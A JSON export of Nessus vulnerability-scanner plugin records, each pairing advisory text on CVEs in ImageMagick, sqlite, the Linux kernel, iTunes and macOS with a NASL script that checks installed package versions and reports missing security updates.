{"nessus": [{"lastseen": "2019-11-17T18:07:48", "bulletinFamily": "scanner", "description": "According to the versions of the ImageMagick packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - ImageMagick is an image display and manipulation tool\n for the X Window System. ImageMagick can read and write\n JPEG, TIFF, PNM, GIF,and Photo CD image formats. It can\n resize, rotate, sharpen, color reduce, or add special\n effects to an image, and when finished you can either\n save the completed work in the original format or a\n different one. ImageMagick also includes command line\n programs for creating animated or transparent .gifs,\n creating composite images, creating thumbnail images,\n and more.ImageMagick is one of your choices if you need\n a program to manipulate and display images. If you want\n to develop your own applications which use ImageMagick\n code or APIs, you need to install ImageMagick-devel as\n well.Security Fix(es):In ImageMagick before 7.0.8-8, a\n NULL pointer dereference exists in the\n GetMagickProperty function in\n MagickCore/property.c.(CVE-2018-16329)ImageMagick\n before 6.9.9-24 and 7.x before 7.0.7-12 has a\n use-after-free in Magick::Image::read in\n Magick++/lib/Image.cpp.(CVE-2017-17499)In ImageMagick\n before 6.9.8-5 and 7.x before 7.0.5-6, there is a\n memory leak in the ReadMATImage function in\n coders/mat.c.(CVE-2017-13146)In ImageMagick before\n 6.9.7-6 and 7.x before 7.0.4-6, the ReadMATImage\n function in coders/mat.c uses uninitialized data, which\n might allow remote attackers to obtain sensitive\n information from process memory.(CVE-2017-13143)In\n ImageMagick before 6.9.9-0 and 7.x before 7.0.6-1, the\n ReadOneMNGImage function in coders/png.c has an\n out-of-bounds read with the MNG CLIP\n chunk.(CVE-2017-13139)coders/psd.c in ImageMagick\n allows remote attackers to have unspecified impact via\n a crafted PSD file, which triggers an out-of-bounds\n 
write.(CVE-2017-5510)coders/psd.c in ImageMagick allows\n remote attackers to have unspecified impact via a\n crafted PSD file, which triggers an out-of-bounds\n write.(CVE-2017-5509)Memory leak in coders/mpc.c in\n ImageMagick before 6.9.7-4 and 7.x before 7.0.4-4\n allows remote attackers to cause a denial of service\n (memory consumption) via vectors involving a pixel\n cache.(CVE-2017-5507)Memory leak in the IsOptionMember\n function in MagickCore/option.c in ImageMagick before\n 6.9.2-2, as used in ODR-PadEnc and other products,\n allows attackers to trigger memory\n consumption.(CVE-2016-10252)Off-by-one error in\n coders/wpg.c in ImageMagick allows remote attackers to\n have unspecified impact via vectors related to a string\n copy.(CVE-2016-10145)Memory leak in\n AcquireVirtualMemory in ImageMagick before 7 allows\n remote attackers to cause a denial of service (memory\n consumption) via unspecified vectors.(CVE-2016-7539)In\n coders/bmp.c in ImageMagick before 7.0.8-16, an input\n file can result in an infinite loop and hang, with high\n CPU and memory consumption. Remote attackers could\n leverage this vulnerability to cause a denial of\n service via a crafted file.(CVE-2018-20467)In\n ImageMagick before 7.0.8-8, a NULL pointer dereference\n exists in the CheckEventLogging function in\n MagickCore/log.c.(CVE-2018-16328)ReadXBMImage in\n coders/xbm.c in ImageMagick before 7.0.8-9 leaves data\n uninitialized when processing an XBM file that has a\n negative pixel value. 
If the affected code is used as a\n library loaded into a process that includes sensitive\n information, that information sometimes can be leaked\n via the image data.(CVE-2018-16323)WriteEPTImage in\n coders/ept.c in ImageMagick 7.0.7-25 Q16 allows remote\n attackers to cause a denial of service\n (MagickCore/memory.c double free and application crash)\n or possibly have unspecified other impact via a crafted\n file.(CVE-2018-8804)In ImageMagick 7.0.8-3 Q16,\n ReadDIBImage and WriteDIBImage in coders/dib.c allow\n attackers to cause an out of bounds write via a crafted\n file.(CVE-2018-12600)ImageMagick version 7.0.7-2\n contains a memory leak in ReadYUVImage in\n coders/yuv.c.(CVE-2017-15033)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "published": "2019-11-12T00:00:00", "id": "EULEROS_SA-2019-2160.NASL", "href": "https://www.tenable.com/plugins/nessus/130869", "title": "EulerOS 2.0 SP5 : ImageMagick (EulerOS-SA-2019-2160)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130869);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2016-10145\",\n \"CVE-2016-10252\",\n \"CVE-2016-7539\",\n \"CVE-2017-13139\",\n \"CVE-2017-13143\",\n \"CVE-2017-13146\",\n \"CVE-2017-15033\",\n \"CVE-2017-17499\",\n \"CVE-2017-5507\",\n \"CVE-2017-5509\",\n \"CVE-2017-5510\",\n \"CVE-2018-12600\",\n \"CVE-2018-16323\",\n \"CVE-2018-16328\",\n \"CVE-2018-16329\",\n \"CVE-2018-20467\",\n \"CVE-2018-8804\"\n );\n\n script_name(english:\"EulerOS 2.0 SP5 : ImageMagick (EulerOS-SA-2019-2160)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ImageMagick packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - ImageMagick is an image display and manipulation tool\n for the X Window System. ImageMagick can read and write\n JPEG, TIFF, PNM, GIF,and Photo CD image formats. It can\n resize, rotate, sharpen, color reduce, or add special\n effects to an image, and when finished you can either\n save the completed work in the original format or a\n different one. ImageMagick also includes command line\n programs for creating animated or transparent .gifs,\n creating composite images, creating thumbnail images,\n and more.ImageMagick is one of your choices if you need\n a program to manipulate and display images. If you want\n to develop your own applications which use ImageMagick\n code or APIs, you need to install ImageMagick-devel as\n well.Security Fix(es):In ImageMagick before 7.0.8-8, a\n NULL pointer dereference exists in the\n GetMagickProperty function in\n MagickCore/property.c.(CVE-2018-16329)ImageMagick\n before 6.9.9-24 and 7.x before 7.0.7-12 has a\n use-after-free in Magick::Image::read in\n Magick++/lib/Image.cpp.(CVE-2017-17499)In ImageMagick\n before 6.9.8-5 and 7.x before 7.0.5-6, there is a\n memory leak in the ReadMATImage function in\n coders/mat.c.(CVE-2017-13146)In ImageMagick before\n 6.9.7-6 and 7.x before 7.0.4-6, the ReadMATImage\n function in coders/mat.c uses uninitialized data, which\n might allow remote attackers to obtain sensitive\n information from process memory.(CVE-2017-13143)In\n ImageMagick before 6.9.9-0 and 7.x before 7.0.6-1, the\n ReadOneMNGImage function in coders/png.c has an\n out-of-bounds read with the MNG CLIP\n chunk.(CVE-2017-13139)coders/psd.c in ImageMagick\n allows remote attackers to 
have unspecified impact via\n a crafted PSD file, which triggers an out-of-bounds\n write.(CVE-2017-5510)coders/psd.c in ImageMagick allows\n remote attackers to have unspecified impact via a\n crafted PSD file, which triggers an out-of-bounds\n write.(CVE-2017-5509)Memory leak in coders/mpc.c in\n ImageMagick before 6.9.7-4 and 7.x before 7.0.4-4\n allows remote attackers to cause a denial of service\n (memory consumption) via vectors involving a pixel\n cache.(CVE-2017-5507)Memory leak in the IsOptionMember\n function in MagickCore/option.c in ImageMagick before\n 6.9.2-2, as used in ODR-PadEnc and other products,\n allows attackers to trigger memory\n consumption.(CVE-2016-10252)Off-by-one error in\n coders/wpg.c in ImageMagick allows remote attackers to\n have unspecified impact via vectors related to a string\n copy.(CVE-2016-10145)Memory leak in\n AcquireVirtualMemory in ImageMagick before 7 allows\n remote attackers to cause a denial of service (memory\n consumption) via unspecified vectors.(CVE-2016-7539)In\n coders/bmp.c in ImageMagick before 7.0.8-16, an input\n file can result in an infinite loop and hang, with high\n CPU and memory consumption. Remote attackers could\n leverage this vulnerability to cause a denial of\n service via a crafted file.(CVE-2018-20467)In\n ImageMagick before 7.0.8-8, a NULL pointer dereference\n exists in the CheckEventLogging function in\n MagickCore/log.c.(CVE-2018-16328)ReadXBMImage in\n coders/xbm.c in ImageMagick before 7.0.8-9 leaves data\n uninitialized when processing an XBM file that has a\n negative pixel value. 
If the affected code is used as a\n library loaded into a process that includes sensitive\n information, that information sometimes can be leaked\n via the image data.(CVE-2018-16323)WriteEPTImage in\n coders/ept.c in ImageMagick 7.0.7-25 Q16 allows remote\n attackers to cause a denial of service\n (MagickCore/memory.c double free and application crash)\n or possibly have unspecified other impact via a crafted\n file.(CVE-2018-8804)In ImageMagick 7.0.8-3 Q16,\n ReadDIBImage and WriteDIBImage in coders/dib.c allow\n attackers to cause an out of bounds write via a crafted\n file.(CVE-2018-12600)ImageMagick version 7.0.7-2\n contains a memory leak in ReadYUVImage in\n coders/yuv.c.(CVE-2017-15033)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2160\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?65bf07e6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ImageMagick packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ImageMagick-c++\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ImageMagick-libs\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:huawei:euleros:ImageMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"ImageMagick-6.9.9.38-3.h11.eulerosv2r7\",\n \"ImageMagick-c++-6.9.9.38-3.h11.eulerosv2r7\",\n \"ImageMagick-libs-6.9.9.38-3.h11.eulerosv2r7\",\n \"ImageMagick-perl-6.9.9.38-3.h11.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n 
security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-01T02:10:07", "bulletinFamily": "scanner", "description": "An update of the sqlite package has been released.", "modified": "2019-11-02T00:00:00", "id": "PHOTONOS_PHSA-2019-2_0-0157_SQLITE.NASL", "href": "https://www.tenable.com/plugins/nessus/124681", "published": "2019-05-08T00:00:00", "title": "Photon OS 2.0: Sqlite PHSA-2019-2.0-0157", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2019-2.0-0157. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124681);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/05/08 5:40:36\");\n\n script_cve_id(\"CVE-2019-9937\");\n\n script_name(english:\"Photon OS 2.0: Sqlite PHSA-2019-2.0-0157\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the sqlite package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-157.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0211\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"sqlite-3.27.2-2.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"sqlite-debuginfo-3.27.2-2.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"sqlite-devel-3.27.2-2.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"sqlite-libs-3.27.2-2.ph2\")) flag++;\n\nif 
(flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sqlite\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:09:00", "bulletinFamily": "scanner", "description": "An update of the linux package has been released.", "modified": "2019-11-02T00:00:00", "id": "PHOTONOS_PHSA-2017-0025_LINUX.NASL", "href": "https://www.tenable.com/plugins/nessus/121716", "published": "2019-02-07T00:00:00", "title": "Photon OS 1.0: Linux PHSA-2017-0025", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0025. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121716);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\"CVE-2017-11176\");\n\n script_name(english:\"Photon OS 1.0: Linux PHSA-2017-0025\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the linux package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-55.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10989\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-debuginfo-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-dev-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-docs-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-drivers-gpu-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-debuginfo-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-devel-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-docs-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-oprofile-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-sound-4.4.77-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", 
reference:\"linux-tools-4.4.77-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-03T11:30:33", "bulletinFamily": "scanner", "description": "The version of Apple iTunes installed on the remote Windows host is\nprior to 12.9.3. It is, therefore, affected by multiple vulnerabilities\nas referenced in the HT209450 advisory:\n\n - Multiple vulnerabilities exist due to input processing\n flaws in the WebKit component. An attacker may be able\n to leverage one of these vulnerability, by providing\n maliciously crafted web content, to execute arbitrary\n code on the host. (CVE-2019-6212, CVE-2019-6215,\n CVE-2019-6216, CVE-2019-6217, CVE-2019-6226,\n CVE-2019-6227, CVE-2019-6233, CVE-2019-6234)\n\n - A universal cross-site scripting vulnerability exists in\n the WebKit component. An attacker may be able to leverage\n this vulnerability, by providing maliciously crafted web\n content, to execute arbitrary script code in the security\n context of any site. (CVE-2019-6229)\n\n - A memory corruption vulnerability exists in the\n AppleKeyStore component. An attacker may be able to\n leverage this vulnerability to allow a process to\n circumvent sandbox restrictions. (CVE-2019-6235)\n\n - An out-of-bounds read vulnerability exists in the\n Core Media component. An attacker may be able to leverage\n this vulnerability to allow a malicious application to\n elevate its privileges. (CVE-2019-6221)\n\n - Multiple memory corruption issues exist in the SQLite\n component. An attacker may be able to leverage these\n vulnerabilities, by executing a malicious SQL query, to\n execute arbitrary code on the host. 
(CVE-2018-20346,\n CVE-2018-20505, CVE-2018-20506)\n\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application", "modified": "2019-11-02T00:00:00", "id": "ITUNES_12_9_3.NASL", "href": "https://www.tenable.com/plugins/nessus/121473", "published": "2019-01-30T00:00:00", "title": "Apple iTunes < 12.9.3 Multiple Vulnerabilities (credentialed check)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121473);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/10/31 15:18:52\");\n\n script_cve_id(\n \"CVE-2018-20346\",\n \"CVE-2018-20505\",\n \"CVE-2018-20506\",\n \"CVE-2019-6212\",\n \"CVE-2019-6215\",\n \"CVE-2019-6216\",\n \"CVE-2019-6217\",\n \"CVE-2019-6221\",\n \"CVE-2019-6226\",\n \"CVE-2019-6227\",\n \"CVE-2019-6229\",\n \"CVE-2019-6233\",\n \"CVE-2019-6234\",\n \"CVE-2019-6235\"\n );\n script_bugtraq_id(\n 106323,\n 106691,\n 106694,\n 106696,\n 106698,\n 106699,\n 106724\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2019-1-24-1\");\n\n script_name(english:\"Apple iTunes < 12.9.3 Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on remote host is affected by multiple\nvulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.9.3. It is, therefore, affected by multiple vulnerabilities\nas referenced in the HT209450 advisory:\n\n - Multiple vulnerabilities exist due to input processing\n flaws in the WebKit component. An attacker may be able\n to leverage one of these vulnerability, by providing\n maliciously crafted web content, to execute arbitrary\n code on the host. 
(CVE-2019-6212, CVE-2019-6215,\n CVE-2019-6216, CVE-2019-6217, CVE-2019-6226,\n CVE-2019-6227, CVE-2019-6233, CVE-2019-6234)\n\n - A universal cross-site scripting vulnerability exists in\n the WebKit component. An attacker may be able to leverage\n this vulnerability, by providing maliciously crafted web\n content, to execute arbitrary script code in the security\n context of any site. (CVE-2019-6229)\n\n - A memory corruption vulnerability exists in the\n AppleKeyStore component. An attacker may be able to\n leverage this vulnerability to allow a process to\n circumvent sandbox restrictions. (CVE-2019-6235)\n\n - An out-of-bounds read vulnerability exists in the\n Core Media component. An attacker may be able to leverage\n this vulnerability to allow a malicious application to\n elevate its privileges. (CVE-2019-6221)\n\n - Multiple memory corruption issues exist in the SQLite\n component. An attacker may be able to leverage these\n vulnerabilities, by executing a malicious SQL query, to\n execute arbitrary code on the host. 
(CVE-2018-20346,\n CVE-2018-20505, CVE-2018-20506)\n\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT209450\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.9.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-6235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_detect.nasl\");\n script_require_keys(\"installed_sw/iTunes Version\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\ninclude(\"vcf.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::get_app_info(app:\"iTunes Version\", win_local:TRUE);\nconstraints = [{\"fixed_version\":\"12.9.3\"}];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, flags:{xss:TRUE});\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-03T11:31:07", "bulletinFamily": "scanner", "description": "The remote host is running a version of macOS / Mac OS X that is\n10.14.x prior to 10.14.3. It is, therefore, affected by multiple\nvulnerabilities related to the following components:\n\n - AppleKeyStore\n - Bluetooth\n - Core Media\n - CoreAnimation\n - FaceTime\n - IOKit\n - Kernel\n - libxpc\n - Natural Language Processing\n - QuartzCore\n - SQLite\n - WebRTC\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.", "modified": "2019-11-02T00:00:00", "id": "MACOS_10_14_3.NASL", "href": "https://www.tenable.com/plugins/nessus/121393", "published": "2019-01-25T00:00:00", "title": "macOS 10.14.x < 10.14.3 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121393);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/10/31 15:18:51\");\n\n script_cve_id(\n \"CVE-2018-20346\",\n \"CVE-2018-20505\",\n \"CVE-2018-20506\",\n \"CVE-2019-6200\",\n \"CVE-2019-6202\",\n \"CVE-2019-6205\",\n \"CVE-2019-6208\",\n 